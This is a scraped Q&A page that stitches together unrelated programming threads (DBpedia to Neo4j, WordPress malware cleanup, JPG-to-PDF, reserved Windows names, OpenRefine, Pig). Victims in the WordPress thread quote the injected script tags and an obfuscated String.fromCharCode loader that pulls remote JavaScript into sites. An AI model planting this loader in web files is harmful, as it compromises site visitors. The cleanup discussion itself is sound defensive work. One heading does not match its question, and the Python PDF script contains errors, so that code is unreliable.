How to import dbpedia into neo4j? [closed] - semantic-web

Closed. This question needs to be more focused. It is not currently accepting answers.
Want to improve this question? Update the question so it focuses on one problem only by editing this post.
Closed 3 years ago.
Improve this question
I need to import dbpedia into neo4j.
I download the dbpedia from here: http://wiki.dbpedia.org/Downloads37
Any idea?

I am currently doing the same thing. I found that the biggest problem for this is the indexing so the best solution is to write a java program that extracts the statements with md5 hashes into a triple file like follows:
subjectHash \t predicateHash \t objectHash \t subject \t predicate \t object \n.
In another file you will need to store the nodes (aka subjects and objects of statements):
nodeHash \t nodeValue
The code for this procedure can be downloaded from my github:
https://github.com/eschleining/DbPediaImport.git
Compile it with mvn package and it creates a jar file in target that takes the gzipped dbpedia files as arguments. If you only have the bz2 files you can transform them like follows:
for i in *.bz2 ; do bzcat "$i" | gzip > "${i%.bz2}.gz"; done &
Now run:
java -jar ConcurrentDataTableWriter-0.0.1-SNAPSHOT.jar yourdbpediaFolder/*.gz
Then you sort the newly created files manually with the sort utility of linux:
gunzip -c nodes.gz | sort -k2 -u | gzip > nodes_unique.gz
And the triples file:
gunzip -c triples.gz | sort -k1,3,2 -u | gzip > triples_unique.gz
Now you can compile the batch inserter of my repo with maven3 (mvn package) and run it in the same directory as the nodes_unique.gz and triples_unique.gz files it creates a Neo4J database directory named "DbpediaNe04J" (mind the typo "0 instead of o).
I found this to be the fastest way since it only looks up an index once for each subject/object pair in a triple.
Feel free to add datatype nodes as properties and so on. I currently have implemented each triple as a relationship between two nodes.

Related

Remove malware line of text from multiple files in Linux [closed]

Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
This question does not appear to be about a specific programming problem, a software algorithm, or software tools primarily used by programmers. If you believe the question would be on-topic on another Stack Exchange site, you can leave a comment to explain where the question may be able to be answered.
Closed 3 years ago.
Improve this question
Recently I have noticed that all my WP sites have injected malware in all the index.php files. I have identified the problem and patch it, however I can not delete the malware linces from the files. I tried this command:
find . -name "*.php" -exec sed -i 's/<script type='text/javascript' src='https://scripts.trasnaltemyrecords.com/talk.js?track=r&subid=547'></script>><//' {} \;
but I get error:
find: missing argument to `-exec'
so I guess I have syntax error. Can you please tell me the exact command to delete in all files this line:
<script type='text/javascript' src='https://scripts.trasnaltemyrecords.com/talk.js?track=r&subid=547'></script>
This is the line I used, I had thee same problem this morning.
grep -rl "<script type='text\/javascript' src='https:\/\/scripts.trasnaltemyrecords.com\/talk.js?track=r&subid=547'><\/script>" | xargs sed -i "s/<script type='text\/javascript' src='https:\/\/scripts.trasnaltemyrecords.com\/talk.js?track=r&subid=547'><\/script>//g"
Check if the plugin "super-socialat" exists and delete it, this is malware too. We found this plugin on all sites with this **** malware.
And please check if adminer.php is uploaded to your server. It seems to be their using adminer to hack the sites:
https://sansec.io/labs/2019/01/17/adminer-4.6.2-file-disclosure-vulnerability/
https://www.foregenix.com/blog/serious-vulnerability-discovered-in-adminer-tool
I encountered the same problem.
The script is not in file, it's in database.
<script src='https://scripts.trasnaltemyrecords.com/pixel.js?track=r&subid=043' type='text/javascript'></script>
Use better search and replace plugin to replace it with blank.
The JS files are also affected.
I ran find -type f -mtime -1
and found this code prepended to all my .js files.
var gdjfgjfgj235f = 1; var d=document;var s=d.createElement('script');
s.type='text/javascript'; s.async=true;
var pl = String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,116,114,97,115,110,97,108,116,101,109,121,114,101,99,111,114,100,115,46,99,111,109,47,116,97,108,107,46,106,115,63,116,114,97,99,107,61,114,38,115,117,98,105,100,61,48,54,48); s.src=pl;
if (document.currentScript) {
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}
wordpress's temp-crawl.php causes the issue.
i have wp and native php sites in the server. suspicious filer re index.* they have this script line mentioned above
also every .js files re infected as well.
and there s a file in the root directory wp-craft-report-conf.php must be deleted.
then it seems everything is working well. at least for now
i have a same problem
i add 127.0.0.1 trasnaltemyrecords.com into /etc/hosts
grep -r * 'scripts.trasnaltemyrecords.com' > file_with_scripts.txt
With this script, i remove this injection
$txt_file = file_get_contents('file_with_scripts.txt');
$rows = explode("\n", $txt_file);
array_shift($rows);
foreach($rows as $row => $data)
{
$filename = $data ;
$file = fopen($filename, 'rw');
$contents = fread($file, filesize($filename));
$new_content = preg_replace('/^<script(.*)script>/i', '', $contents);
echo $new_content;
fclose($file);
}
Check your database if you use ACF
Check too this topic in Wordpress.org
https://wordpress.org/support/topic/malware-found-injected-script/

Batch conversion of jpg to pdf [closed]

Closed. This question needs to be more focused. It is not currently accepting answers.
Want to improve this question? Update the question so it focuses on one problem only by editing this post.
Closed 3 years ago.
Improve this question
I have huge amount of jpeg files each being a photho of a page of from a historical document. Now I want to (batch) create pdf files out of these, preferably making those files representing one document into separate pdf files, with the pages in the correct order. Filenames are constructed like this "date y p id optional.jpg" where y is the running number if several documents have the same date, p is the page number, id is the number of the photo from the camera and finally optional sometimes is present and contains optional info on the document. All pieces are separated by a space.
I was hoping to find a possibility to use the built in Microsoft PDF writer, but have not found a comand line interface for that. I can of course make a script from the directory listing, only that I know the command line interface of the application to make the script for. A bonus would be if each page of the created pdf file could contain parts of the filename.
If you aren't against a python script there is an image to pdf library known as img2pdf. The PyPi link can be found here and I would be happy to do up a quick script for you
EDIT:
A tutorial can be found here
EDIT 2:
This should do
## Import libraries ##
import img2pdf, os
from Pillow import Image
# sets an empty list var to store the dir
dirofjpgs = "PUT DIRECTORY HERE" # formatting is C:\\User not C:\User\
pathforpdfs = "PUT DIRECTORY HERE"
# change dir to working dir
os.chdir(dirofjpgs)
NameOfFiles = []
# sets and empty list to store the names of files
ExtOfFiles = []
# sets and empty list to store the names and extentions of files
self_file = os.path.basename(__file__)
for i in range(1, len(os.listdir(os.curdir))): # for every item in the current dir
if (os.path.splitext((os.listdir(os.curdir))[i])[1]) != ".ini": # if the item ends doesnt end in .ini which is a windows file
NameOfFiles.append(os.path.splitext((os.listdir(os.curdir))[i])[0]) # adds the Name of the file into the NameOfFiles list
ExtOfFiles.append(os.path.splitext((os.listdir(os.curdir))[i])[1]) # adds the Name and Extention of the file into the ExtOfFiles list
# for every item in the nameoffiles list
for i in range(len(NameOfFiles)):
# open image with pillow
image = Image.open(NameOfFiles[i], ExtOfFiles[i])
# convert with img2pdf
pdf_values = img2pdf.convert(image.filename)
# save as pdf in dir
file = open(pathforpdfs, "wb")
file.write(pdf_values)
#close
image.close()
file.close()
print(str(i+1), "/", len(NameOfFiles))
mg2pdf-module/

Numpy cannot save with certain name(s) [duplicate]

Closed. This question is off-topic. It is not currently accepting answers.
Want to improve this question? Update the question so it's on-topic for Stack Overflow.
Closed 11 years ago.
Improve this question
Why in Windows, can't you name a folder 'con'?
Whenever I try to name a folder as "con" (without the quotes) it defaults to its original name.
Why does it do this?
Back in the MS-DOS days, "con" had a special meaning. It referred to the console, and allowed you to treat it like any other file. For example, you might create a new text file by typing copy con new.txt. Then you could enter your text and hit ^Z when finished.
The thing is, you can still do that. Therefore, as far as the file system is concerned there is already an object out there named con. There are other reserved names as well, but I see that while typing this those names have been provided already in other answers.
Do not use the following reserved device names for the name of a file:
CON, PRN, AUX, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, and LPT9
Source: MSDN
Other names, such as drive names, cannot be used as well:
CLOCK$, A:-Z:
Source: Microsoft support
Actually you can rename the folder to con
use this in the command prompt and this creates a system folder named con on your C: Drive
md \\\\\.\\\C:\con
to remove this folder you need to use this in the command prompt
rd/s \\\\.\\\C:\con
And just for those that are wondering "so why would you?" - my name is CON and if I wish to use that as my folder I WILL so "bugger you MS"
Con "OzDing"
This dates back to MS-DOS. Reading or writing to a file named "CON:" read/wrote from the console. I imagine Windows is still supporting this for backwards compatibility.
From Microsoft TechNet:
Several special file names are reserved by the system and cannot be used for files or folders:
CON, AUX, COM1, COM2, COM3, COM4,
LPT1, LPT2, LPT3, PRN, NUL

Batch edit in OpenRefine

So, I have a bunch of .csv files which need cleaning. They all need to go through the same steps, so I've extracted OpenRefine's operation history in order to apply it to other ones.
I could open each file one by one in OpenRefine and apply the extracted JSON history. But there are a lot of files...
Also, I don't have enough memory to open them all at once in OpenRefine (multiple selecting when opening the files).
Is there any way I could edit them all or automatically using that JSON I extracted from OpenRefine?
That's what we created BatchRefine for, the README should be pretty much self-explanatory. If not, let me know.
I just recently converted 4 million CSV records to RDF using BatchRefine, took me less than 10 minutes on my MacBook Pro.
I execute BatchRefine with this simple shell script:
#!/bin/bash
for file in ./input/*.tsv
do
filename=$(basename "$file")
if [ ! -f "target/"$filename"-transformed" ]
then
echo Processing $filename...
curl -XPOST -H 'Accept: text/turtle' -H 'Content-Type:text/csv' --data-binary "#"$file -o "target/"$filename"-transformed" 'localhost:8310/?refinejson=http://localhost:8000/bar-config.json'
else
echo Found "target/"$filename"-transformed", skipping $file
fi
done;
Note that you need to adjust the Acceptheader in the script, I guess you want CSV as output again, not RDF.
You can automate some OpenRefine operations using one of the existing libraries:
python
An other python library
ruby
javascript - nodejs

Apache pig load multiple files

I have the following folder structure containing my content adhering to the same schema -
/project/20160101/part-v121
/project/20160105/part-v121
/project/20160102/part-v121
/project/20170104/part-v121
I have implemented a pig script which uses JSONLoader to load & processes individual files. However I need to make it generic to read all the files under the dated folder.
Right now I have managed to extract the file paths using the following -
hdfs -ls hdfs://local:8080/project/20* > /tmp/ei.txt
cat /tmp/ei.txt | awk '{print $NF}' | grep part > /tmp/res.txt
Now I need to know how do I pass this list to pig script so that my program runs on all the files.
We can use regex path in LOAD statement.
In your case the below statement should help, let me know if you face any issues.
A = LOAD 'hdfs://local:8080/project/20160102/*' USING JsonLoader();
Assuming .pig_schema (produced by JsonStorage) in the input directory.
Ref : https://pig.apache.org/docs/r0.10.0/func.html#jsonloadstore